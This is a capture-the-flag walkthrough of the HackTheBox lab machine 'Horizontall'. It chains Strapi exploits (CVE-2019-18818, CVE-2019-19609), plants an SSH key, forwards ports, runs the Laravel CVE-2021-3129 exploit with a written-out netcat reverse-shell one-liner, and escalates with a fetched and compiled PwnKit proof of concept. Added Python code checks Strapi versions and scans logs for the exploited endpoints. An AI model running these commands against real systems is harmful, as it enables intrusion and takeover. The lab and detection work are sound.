# Horizontall

## Nmap

```
sudo nmap 10.10.11.105 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

{% hint style="info" %}
Add horizontall.htb to /etc/hosts.
{% endhint %}

Starting out we see a custom webpage running on Nginx. After running through directory enumeration we are unable to pull any interesting results.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FdWjvTFHo6mAHsrXqfiOb%2Fimage.png?alt=media\&token=70c7cf2e-fa1d-401a-8573-dd8c43970201)

Checking the network requests manually, we do see some `.js` files being loaded.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FWWUUdu8dFWsh3XZz9VW2%2Fimage.png?alt=media\&token=6a023681-fae9-4d54-a496-68c6287a0cbc)

Browsing manually to one of the requests we see a large amount of code within the application script.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FhUPx9h28M074iOUF8Ndq%2Fimage.png?alt=media\&token=e10a39e5-2f4e-4beb-9b7d-f48a7c43bf2c)

Using `CyberChef` we are able to extract any information which may be of interest to us; in this case, a subdomain URL.

**Cyberchef:** <https://gchq.github.io/CyberChef/>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FUTvULN39PiuYmwWAl5ja%2Fimage.png?alt=media\&token=6edccda2-7c7c-4bf8-be38-6d26768e3404)

{% hint style="info" %}
Add api-prod.horizontall.htb to /etc/hosts.
{% endhint %}

After adding *api-prod.horizontall.htb* to our hosts file we are then able to browse to the root page as shown below.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FZUVjgsKF93lrTOLBj79y%2Fimage.png?alt=media\&token=60f9cd27-7b86-4e13-aff1-d14bc2ee8b40)

`Feroxbuster` reveals an */Admin* directory which redirects to a Strapi login page.

```bash
feroxbuster -u http://api-prod.horizontall.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FhpYWo8BWNHwgB6Ju9jOm%2Fimage.png?alt=media\&token=a47526f0-9170-4ecd-a0cc-4015f08cce8e)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fo1G6s7DCjEPnTqQA6YY8%2Fimage.png?alt=media\&token=896608a3-3dea-4cfe-96b4-0a4c0af37e94)

Using `searchsploit` we are able to determine an unauthenticated `RCE` exists for version *3.0.0-beta.17.4*.

```bash
searchsploit -w "strapi"
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FIiPv6IbUEfKTESu8uQq2%2Fimage.png?alt=media\&token=89bd05c2-3b96-4421-989d-d4e49ba9207a)

We check the current Strapi version with `curl` against the `/admin/init` endpoint to confirm that we are working with a vulnerable version.

```bash
curl "http://api-prod.horizontall.htb/admin/init"
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FHa5a4agChDkn9aT97e9m%2Fimage.png?alt=media\&token=c0d6e216-bb31-42e4-b3a9-11b7ccf53667)
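As an added example (not from the original writeup), a small Python helper that parses the `/admin/init` response and compares the reported version against the first fixed release, so the same check can be scripted across an inventory of Strapi hosts. It assumes Strapi 3 reports its version under `data.strapiVersion` and uses the NVD threshold for CVE-2019-18818 (fixed in 3.0.0-beta.17.5); the sample response body is constructed.

```python
import json
import re
import urllib.request

# Threshold from the NVD advisory for CVE-2019-18818: Strapi before 3.0.0-beta.17.5 is affected.
FIXED_VERSION = "3.0.0-beta.17.5"

# Constructed sample of the /admin/init JSON body; the key name strapiVersion is assumed from
# Strapi 3's admin API and is the field the curl command above displays.
SAMPLE_INIT_BODY = ('{"data":{"uuid":"00000000-0000-0000-0000-000000000000",'
                    '"currentEnvironment":"production","autoReload":false,'
                    '"strapiVersion":"3.0.0-beta.17.4"}}')

_TOKEN = re.compile(r"\d+|[A-Za-z]+")

def parse_version(v):
    """Turn '3.0.0-beta.17.4' into a tuple that orders pre-releases below the final release
    and numeric pre-release parts below alphabetic ones, as semver precedence requires."""
    base, _, pre = v.partition("-")
    key = tuple(int(p) for p in base.split("."))
    if not pre:
        return key + ((1,),)  # a final release outranks any pre-release of the same base
    pre_key = tuple((0, int(t)) if t.isdigit() else (1, t) for t in _TOKEN.findall(pre))
    return key + ((0,) + pre_key,)

def version_from_init(body):
    """Extract data.strapiVersion from the /admin/init response; None if it is not there."""
    try:
        return json.loads(body)["data"]["strapiVersion"]
    except (ValueError, KeyError, TypeError):
        return None

def is_vulnerable(version, fixed=FIXED_VERSION):
    """True when the reported version sorts below the first fixed release."""
    return parse_version(version) < parse_version(fixed)

def check_strapi(base_url, timeout=5):
    """Live check against a Strapi host (needs network): returns (version, vulnerable)."""
    with urllib.request.urlopen(base_url.rstrip("/") + "/admin/init", timeout=timeout) as resp:
        version = version_from_init(resp.read().decode())
    return version, version is not None and is_vulnerable(version)

if __name__ == "__main__":
    v = version_from_init(SAMPLE_INIT_BODY)
    print(v, "vulnerable" if is_vulnerable(v) else "patched")
```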

The exploit linked below resets the admin account's password and returns a JWT, which is required for the next exploit.

**Exploit-DB:** <https://www.exploit-db.com/exploits/50239> **(CVE-2019-18818)**

**NIST:** <https://nvd.nist.gov/vuln/detail/CVE-2019-18818>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fqq935B1VFo3qmUPQnY5o%2Fimage.png?alt=media\&token=c8648a7b-a65e-47e7-a975-ea0ca591c247)

With the generated JWT token we can now perform the authenticated RCE exploit and gain a shell on the target system. (Remember to set up a netcat listener on port 9001 first.)

**Github:** <https://github.com/z9fr/CVE-2019-19609/blob/main/exploit.py> **(CVE-2019-19609)**

**NIST:** <https://nvd.nist.gov/vuln/detail/CVE-2019-19609>

```bash
python3 exploit.py <rhost> <lhost> <jwt> <url>
python3 exploit.py api-prod.horizontall.htb 10.10.14.14 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjQ0NTI2ODgzLCJleHAiOjE2NDcxMTg4ODN9.2t51kjz4yTrHHUYHG3Ag799fLWiHLspwzccAX5bdsW0 http://api-prod.horizontall.htb/
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FFoqA5KBEJMwAs7TkLGzO%2Fimage.png?alt=media\&token=8b85d235-3fb4-4b7d-8300-3fe71923d050)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FDvrqCsP9pFtzWDWRpIRl%2Fimage.png?alt=media\&token=16d1a1b7-5c81-40bf-9efe-7c7b44bb68e4)

For the next part we set up an `SSH` connection to allow easier exploitation of the target system.

**SSH**

For `SSH` access, create a .ssh directory in the *strapi* user's home directory, generate an `SSH` key pair, and place the public key in an authorized\_keys file.

```bash
# Create the .ssh folder in the strapi user's home (/opt/strapi); sshd ignores it if it is group/world writable
mkdir -p /opt/strapi/.ssh
chmod 700 /opt/strapi/.ssh

# Generate an SSH key pair (press Enter at each prompt to accept the defaults)
ssh-keygen

# Write the contents of id_rsa.pub into authorized_keys and restrict its permissions
echo "<Contents of id_rsa.pub>" > /opt/strapi/.ssh/authorized_keys
chmod 600 /opt/strapi/.ssh/authorized_keys

# Next, copy id_rsa to the attacking system and SSH in as the strapi user.
ssh -i id_rsa strapi@10.10.11.105
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FUXFaQcvmeapDYvihuLbp%2Fimage.png?alt=media\&token=0fc33c0b-7b10-4628-bbcb-d4ef3863fb45)

Now in via SSH, and after some basic enumeration, we see some interesting internal services listening.

```bash
netstat -auntp
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FDRQ8Fa8K6WMB13t3LYwo%2Fimage.png?alt=media\&token=26119c1f-0f88-4202-9883-43d1cbcdf6e1)

Checking what is running on the local ports with `curl`, we see that Laravel v8 is running on port 8000.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FeVWuaX7qU4UCjDboVcOs%2Fimage.png?alt=media\&token=9501b8ba-05e3-4224-8782-4e8fe323af36)

According to `searchsploit` Laravel v8 may be vulnerable to `RCE`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FR8ZmLGqmuoOhf0l52JpI%2Fimage.png?alt=media\&token=6250196b-e67a-4cf8-9954-ba34a066d81e)

In order to make the Laravel web page available to our attacking system we need to forward the internal port to our attacking host. With the SSH connection now set up we can reuse it as shown below:

**SSH local port forward (target's 127.0.0.1:8000 to our local port 8000)**

```bash
ssh -i id_rsa strapi@10.10.11.105 -L 8000:127.0.0.1:8000
```

We can then access Laravel over localhost on the attacking system.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FhKTAZNggI7KenBMmD3f1%2Fimage.png?alt=media\&token=c8c25b55-1354-4f72-b2f7-7a9c4799681b)

I did not have much luck with the `searchsploit` suggested PoC. However, the PoC linked below worked much better.

**Github:** <https://github.com/nth347/CVE-2021-3129_exploit>

**Usage:**

```bash
git clone https://github.com/nth347/CVE-2021-3129_exploit.git
cd CVE-2021-3129_exploit
chmod +x exploit.py
./exploit.py http://localhost:8000 Monolog/RCE3 id
```

A reverse shell can be obtained with the following, as `nc` is installed on the target system.

```bash
./exploit.py 'http://localhost:8000' Monolog/RCE2 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 9000 >/tmp/f"
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FCx2MXs55kygbVxSoXtTv%2Fimage.png?alt=media\&token=45b2d97b-554c-42c9-b351-714b2a0173e5)
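As an added detection example covering both exploitation chains above, the Strapi admin abuse and the Laravel Ignition call (not part of the original writeup): a Python scanner over nginx access logs that flags the Strapi admin endpoints abused by CVE-2019-18818 / CVE-2019-19609 and the Ignition endpoint abused by CVE-2021-3129. The log lines are constructed, and the endpoint paths are assumed from the public advisories rather than taken from the page.

```python
import re
from collections import Counter

# Constructed nginx combined-format access-log lines modelled on this page's two chains:
# Strapi admin abuse from the attacker's host, then the Ignition call arriving from 127.0.0.1
# because it was sent through the SSH port forward (a localhost source is not a safe signal).
SAMPLE_LOG = """\
10.10.14.14 - - [10/Feb/2022:21:01:02 +0000] "GET /admin/init HTTP/1.1" 200 118 "-" "curl/7.81.0"
10.10.14.14 - - [10/Feb/2022:21:01:09 +0000] "POST /admin/auth/reset-password HTTP/1.1" 400 97 "-" "python-requests/2.27.1"
10.10.14.14 - - [10/Feb/2022:21:01:10 +0000] "POST /admin/auth/reset-password HTTP/1.1" 200 412 "-" "python-requests/2.27.1"
10.10.14.14 - - [10/Feb/2022:21:02:33 +0000] "POST /admin/plugins/install HTTP/1.1" 200 56 "-" "python-requests/2.27.1"
127.0.0.1 - - [10/Feb/2022:21:15:41 +0000] "GET /_ignition/health-check HTTP/1.1" 200 30 "-" "python-requests/2.27.1"
127.0.0.1 - - [10/Feb/2022:21:15:42 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "python-requests/2.27.1"
10.10.14.200 - - [10/Feb/2022:21:20:00 +0000] "GET / HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# (rule name, HTTP method, path pattern). Endpoint paths are assumed from the public advisories.
# The two *-probe rules are low signal alone; they matter when followed by the exploit endpoints.
RULES = [
    ("strapi-version-probe", "GET", re.compile(r"^/admin/init$")),
    ("strapi-password-reset CVE-2019-18818", "POST", re.compile(r"^/admin/auth/reset-password$")),
    ("strapi-plugin-install CVE-2019-19609", "POST", re.compile(r"^/admin/plugins/(un)?install$")),
    ("ignition-debug-probe", "GET", re.compile(r"^/_ignition/health-check$")),
    ("ignition-execute-solution CVE-2021-3129", "POST", re.compile(r"^/_ignition/execute-solution$")),
]

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def match_rules(entry):
    """Names of every rule whose method and path match this request."""
    return [name for name, method, pat in RULES
            if entry["method"] == method and pat.match(entry["path"])]

def scan(log_text):
    """Return (hits, per_ip): hits are (ip, method, path, status, rule names); per_ip counts hits."""
    hits, per_ip = [], Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        names = match_rules(entry) if entry else []
        if names:
            hits.append((entry["ip"], entry["method"], entry["path"], int(entry["status"]), names))
            per_ip[entry["ip"]] += 1
    return hits, per_ip
```

Run against the real logs, the reset-password and plugin-install hits are the ones to alert on; the Strapi admin API should not be reachable from the internet at all, and the Ignition route only exists while `APP_DEBUG` is enabled.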

**Exploit #2 CVE-2021-4034**

**NIST:** <https://nvd.nist.gov/vuln/detail/CVE-2021-4034>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FmAbAokNnEQhWTrSAM1F7%2Fimage.png?alt=media\&token=4707b576-527e-4e20-a6c5-765dd06e34fb)

**Github:** <https://github.com/arthepsy/CVE-2021-4034> **(CVE-2021-4034)**

Download the PoC to the target system, then compile and execute it.

```bash
wget 'http://<IP>/poc.c'
gcc 'poc.c' -o 'exploit'
chmod +x ./exploit
./exploit
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FRoB8PpyhXmzBW7cFsDKg%2Fimage.png?alt=media\&token=318a1c52-a286-4e6c-8cae-d741ee94f152)
